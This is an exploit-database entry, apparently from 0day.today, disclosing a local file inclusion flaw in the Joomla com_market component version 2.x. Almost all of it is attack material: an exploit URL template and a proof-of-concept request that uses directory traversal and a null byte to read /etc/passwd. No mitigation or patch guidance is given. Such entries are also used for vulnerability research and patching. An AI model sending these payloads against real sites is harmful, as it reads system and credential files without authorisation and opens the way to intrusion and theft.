id: 11752
date: 04/12/2010
title: Joomla Component com_market Local File Inclusion Vulnerability
author: AntiSecurity
cves: 

==============================================================
Joomla Component com_market Local File Inclusion Vulnerability
==============================================================

============================================================================================================
 
 
  [o] Joomla Component Online Market Local File Inclusion Vulnerability
  
       Software : com_market version 2.x
       Author   : AntiSecurity [ Vrs-hCk NoGe OoN_BoY Paman zxvf s4va ]
       Contact  : public[at]antisecurity[dot]org
       Home     : http://antisecurity.org/
 
 
============================================================================================================
 
 
  [o] Exploit
 
       http://localhost/[path]/index.php?option=com_market&controller=[LFI]
 
 
  [o] PoC
 
       http://localhost/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00
 
 
============================================================================================================



#  0day.today [2023-03-24]  #